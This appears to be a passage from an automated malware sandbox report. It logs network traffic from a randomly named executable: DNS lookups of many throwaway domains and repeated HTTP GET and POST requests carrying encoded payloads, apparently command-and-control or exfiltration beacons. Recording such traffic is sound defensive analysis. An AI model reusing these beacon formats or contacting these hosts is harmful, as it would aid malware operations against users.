                                                                                                            Nov 22, 2024 07:57:24.179580927 CET8050008172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:24.179696083 CET8050008172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:24.179761887 CET5000880192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:24.179761887 CET5000880192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:24.528310061 CET5000880192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:25.547269106 CET5000980192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:25.666943073 CET8050009172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:25.667016983 CET5000980192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:25.676951885 CET5000980192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:25.796437979 CET8050009172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:26.873251915 CET8050009172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:26.873310089 CET8050009172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:26.873343945 CET8050009172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:26.873409986 CET5000980192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:26.873482943 CET5000980192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:26.876086950 CET5000980192.168.2.5172.67.209.48
                                                                                                            Nov 22, 2024 07:57:26.996062994 CET8050009172.67.209.48192.168.2.5
                                                                                                            Nov 22, 2024 07:57:32.393095970 CET5001080192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:32.512927055 CET8050010209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:32.513134003 CET5001080192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:32.527621984 CET5001080192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:32.647500038 CET8050010209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:33.739012003 CET8050010209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:33.739051104 CET8050010209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:33.739104986 CET5001080192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:34.043932915 CET5001080192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:35.062566996 CET5001180192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:35.182300091 CET8050011209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:35.182465076 CET5001180192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:35.197118044 CET5001180192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:35.317333937 CET8050011209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:36.404454947 CET8050011209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:36.404567003 CET8050011209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:36.404742002 CET5001180192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:36.700191975 CET5001180192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:37.718863964 CET5001280192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:37.838702917 CET8050012209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:37.838810921 CET5001280192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:37.855245113 CET5001280192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:38.106501102 CET5001280192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:38.465593100 CET8050012209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:38.465637922 CET8050012209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:38.465651989 CET8050012209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:39.107515097 CET8050012209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:39.107625008 CET8050012209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:39.107716084 CET5001280192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:39.356439114 CET5001280192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:40.376106024 CET5001380192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:40.495898008 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:40.495986938 CET5001380192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:40.504962921 CET5001380192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:40.624572992 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:41.774331093 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:41.774363995 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:41.774527073 CET5001380192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:41.798686028 CET5001380192.168.2.5209.74.77.109
                                                                                                            Nov 22, 2024 07:57:41.918247938 CET8050013209.74.77.109192.168.2.5
                                                                                                            Nov 22, 2024 07:57:47.383517027 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:47.503209114 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:47.506076097 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:47.521241903 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:47.640888929 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:48.796672106 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:48.796721935 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:48.796772003 CET8050014161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:48.796785116 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:48.796871901 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:49.028439999 CET5001480192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:50.312525034 CET5001580192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:50.432476997 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:50.432823896 CET5001580192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:50.447796106 CET5001580192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:50.567420006 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:51.769519091 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:51.769551992 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:51.769568920 CET8050015161.97.142.144192.168.2.5
                                                                                                            Nov 22, 2024 07:57:51.769615889 CET5001580192.168.2.5161.97.142.144
                                                                                                            Nov 22, 2024 07:57:51.769850016 CET5001580192.168.2.5161.97.142.144

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 22, 2024 07:55:09.553816080 CET5088953192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:55:10.497601032 CET53508891.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:55:27.382989883 CET5795153192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:55:28.232800007 CET53579511.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:55:43.016285896 CET5237253192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:55:43.782174110 CET53523721.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:55:58.313363075 CET6522653192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:55:59.309575081 CET6522653192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:55:59.481560946 CET53652261.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:55:59.481604099 CET53652261.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:56:14.032087088 CET5652953192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:56:14.976993084 CET53565291.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:56:29.531847000 CET5578753192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:56:30.544394970 CET5578753192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:56:30.649960041 CET53557871.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:56:30.681937933 CET53557871.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:56:45.312405109 CET5652853192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:56:46.080504894 CET53565281.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:57:01.625462055 CET5113453192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:57:02.369574070 CET53511341.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:57:17.251210928 CET5553553192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:57:17.558016062 CET53555351.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:57:31.891676903 CET5915753192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:57:32.390450001 CET53591571.1.1.1192.168.2.5
                                                                                                            Nov 22, 2024 07:57:46.813355923 CET6042553192.168.2.51.1.1.1
                                                                                                            Nov 22, 2024 07:57:47.287425041 CET53604251.1.1.1192.168.2.5

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 22, 2024 07:55:09.553816080 CET192.168.2.51.1.1.10x8b4aStandard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:27.382989883 CET192.168.2.51.1.1.10x4c58Standard query (0)www.70kdd.topA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:43.016285896 CET192.168.2.51.1.1.10x72b0Standard query (0)www.acond-22-mvr.clickA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:58.313363075 CET192.168.2.51.1.1.10xcfc3Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:59.309575081 CET192.168.2.51.1.1.10xcfc3Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:56:14.032087088 CET192.168.2.51.1.1.10xbc8fStandard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:56:29.531847000 CET192.168.2.51.1.1.10xc3bbStandard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:56:30.544394970 CET192.168.2.51.1.1.10xc3bbStandard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:56:45.312405109 CET192.168.2.51.1.1.10xf6f5Standard query (0)www.matteicapital.onlineA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:57:01.625462055 CET192.168.2.51.1.1.10x9e89Standard query (0)www.llljjjiii.shopA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:57:17.251210928 CET192.168.2.51.1.1.10x5aa6Standard query (0)www.ampsamkok88.shopA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:57:31.891676903 CET192.168.2.51.1.1.10x274aStandard query (0)www.gogawithme.liveA (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:57:46.813355923 CET192.168.2.51.1.1.10xb942Standard query (0)www.54248711.xyzA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 22, 2024 07:55:10.497601032 CET1.1.1.1192.168.2.50x8b4aNo error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:10.497601032 CET1.1.1.1192.168.2.50x8b4aNo error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:28.232800007 CET1.1.1.1192.168.2.50x4c58No error (0)www.70kdd.top70kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:28.232800007 CET1.1.1.1192.168.2.50x4c58No error (0)70kdd.top38.47.232.124A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:43.782174110 CET1.1.1.1192.168.2.50x72b0No error (0)www.acond-22-mvr.click199.59.243.227A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:59.481560946 CET1.1.1.1192.168.2.50xcfc3No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:59.481560946 CET1.1.1.1192.168.2.50xcfc3No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:59.481604099 CET1.1.1.1192.168.2.50xcfc3No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:55:59.481604099 CET1.1.1.1192.168.2.50xcfc3No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:56:14.976993084 CET1.1.1.1192.168.2.50xbc8fNo error (0)www.mrpokrovskii.pro194.85.61.76A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:56:14.976993084 CET1.1.1.1192.168.2.50xbc8fNo error (0)www.mrpokrovskii.pro109.70.26.37A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:56:30.649960041 CET1.1.1.1192.168.2.50xc3bbNo error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:56:30.681937933 CET1.1.1.1192.168.2.50xc3bbNo error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:56:46.080504894 CET1.1.1.1192.168.2.50xf6f5No error (0)www.matteicapital.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:57:02.369574070 CET1.1.1.1192.168.2.50x9e89No error (0)www.llljjjiii.shop8.210.114.150A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:57:17.558016062 CET1.1.1.1192.168.2.50x5aa6No error (0)www.ampsamkok88.shop172.67.209.48A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:57:17.558016062 CET1.1.1.1192.168.2.50x5aa6No error (0)www.ampsamkok88.shop104.21.15.243A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:57:32.390450001 CET1.1.1.1192.168.2.50x274aNo error (0)www.gogawithme.live209.74.77.109A (IP address)IN (0x0001)false
                                                                                                            Nov 22, 2024 07:57:47.287425041 CET1.1.1.1192.168.2.50xb942No error (0)www.54248711.xyz161.97.142.144A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • www.rtpterbaruwaktu3.xyz
                                                                                                            • www.70kdd.top
                                                                                                            • www.acond-22-mvr.click
                                                                                                            • www.smartcongress.net
                                                                                                            • www.mrpokrovskii.pro
                                                                                                            • www.ytsd88.top
                                                                                                            • www.matteicapital.online
                                                                                                            • www.llljjjiii.shop
                                                                                                            • www.ampsamkok88.shop
                                                                                                            • www.gogawithme.live
                                                                                                            • www.54248711.xyz

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.549726103.21.221.87802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:10.634231091 CET358OUTGET /7yx4/?jbeXk=EHbdQPuX&cla=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag== HTTP/1.1
                                                                                                            Host: www.rtpterbaruwaktu3.xyz
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:55:12.263582945 CET1033INHTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 796
                                                                                                            date: Fri, 22 Nov 2024 06:55:11 GMT
                                                                                                            server: LiteSpeed
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.54976738.47.232.124802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:28.371376991 CET595OUTPOST /klhq/ HTTP/1.1
                                                                                                            Host: www.70kdd.top
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.70kdd.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.70kdd.top/klhq/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 4c 46 4d 7a 71 53 38 62 36 45 71 67 62 71 59 68 4d 71 39 72 51 4a 47 65 42 72 6a 34 30 2b 78 58 33 6e 6a 2f 4a 67 3d
                                                                                                            Data Ascii: cla=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2cLFMzqS8b6EqgbqYhMq9rQJGeBrj40+xX3nj/Jg=
                                                                                                            Nov 22, 2024 07:55:29.912131071 CET312INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:55:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 148
                                                                                                            Connection: close
                                                                                                            ETag: "66e01838-94"
                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.54977338.47.232.124802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:31.045470953 CET615OUTPOST /klhq/ HTTP/1.1
                                                                                                            Host: www.70kdd.top
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.70kdd.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.70kdd.top/klhq/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 77 56 54 6b 33 4d 31 6f 39 46 36 34 34 75 4b 6a 33 31 46 31 65 46 7a 54 6e 62 6d 7a 44 6d 68 42 32 70 63 6f 78 75 47 38 49 55 69 4e 33 65 72 33 78 6a 37 5a 34 68 30 34 77 55 39 4b 44 67 30 42 43 65 32 74 38 53 41 30 50 63 4a 32 41 6d 31 56 68 66 35 65 67 65 39 6f 36 61 38 41 5a 36 62 70 46 69 7a 55 34 4b 69 4d 42 37 2b 6e 74 51 49 47 71 58 47 76 4a 74 52 35 31 79 32 70 37 30 59 70 38 53 73 4e 62 79 37 75 69 56 34 77 6c 2b 4f 53 6a 55 70 45 66 59 4e 55 33 54 68 65 33 77 69 64 30 33 72 68 4a 30 43 6c 4c 39 4d 67 6c 74 69 49 71 46
                                                                                                            Data Ascii: cla=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+wVTk3M1o9F644uKj31F1eFzTnbmzDmhB2pcoxuG8IUiN3er3xj7Z4h04wU9KDg0BCe2t8SA0PcJ2Am1Vhf5ege9o6a8AZ6bpFizU4KiMB7+ntQIGqXGvJtR51y2p70Yp8SsNby7uiV4wl+OSjUpEfYNU3The3wid03rhJ0ClL9MgltiIqF
                                                                                                            Nov 22, 2024 07:55:32.611973047 CET312INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:55:32 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 148
                                                                                                            Connection: close
                                                                                                            ETag: "66e01838-94"
                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.54977938.47.232.124802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:55:33.712275028 CET1632OUTPOST /klhq/ HTTP/1.1
                                                                                                            Host: www.70kdd.top
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.70kdd.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.70kdd.top/klhq/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 58 35 6b 4c 70 42 72 39 2f 50 6c 6f 59 38 36 6b 2b 74 44 51 63 30 2f 53 51 42 64 75 44 2b 34 56 54 52 72 4d 36 72 46 46 39 34 34 75 55 7a 33 30 46 31 65 59 7a 54 2f 58 6d 7a 50 32 68 45 79 70 64 4c 35 75 50 74 49 55 73 4e 33 65 67 58 78 67 6c 70 35 70 30 34 67 51 39 4b 54 67 30 42 43 65 32 76 55 53 4a 41 62 63 47 57 41 68 38 31 68 44 39 65 67 32 39 72 4c 76 38 41 74 71 62 64 4a 69 7a 77 55 4b 78 4b 56 37 38 48 73 32 4c 47 71 50 47 75 31 49 52 39 63 42 32 70 2f 65 59 70 45 53 70 70 43 79 75 2b 6d 64 73 79 6c 39 44 44 2f 45 6f 69 66 69 56 48 44 39 70 74 6e 39 72 4f 6b 47 72 56 4e 78 50 56 4b 55 65 30 78 46 76 2f 76 33 64 4a 48 31 34 70 38 6d 48 4b 66 7a 48 76 78 44 4f 41 49 6d 37 54 36 48 57 51 38 66 41 68 77 4a 36 31 70 34 57 6f 6c 4d 4e 55 68 44 76 30 2f 39 41 54 41 7a 53 6e 49 39 67 6a 37 54 43 6f 54 76 52 70 34 71 6c 79 4a 63 50 48 4d 6a 73 47 59 48 53 42 47 69 6f 39 61 4c 56 51 33 73 71 71 73 4c 75 71 56 79 45 54 51 45 57 4f 6a 67 2f 6b 6b 34 77 4c [TRUNCATED]
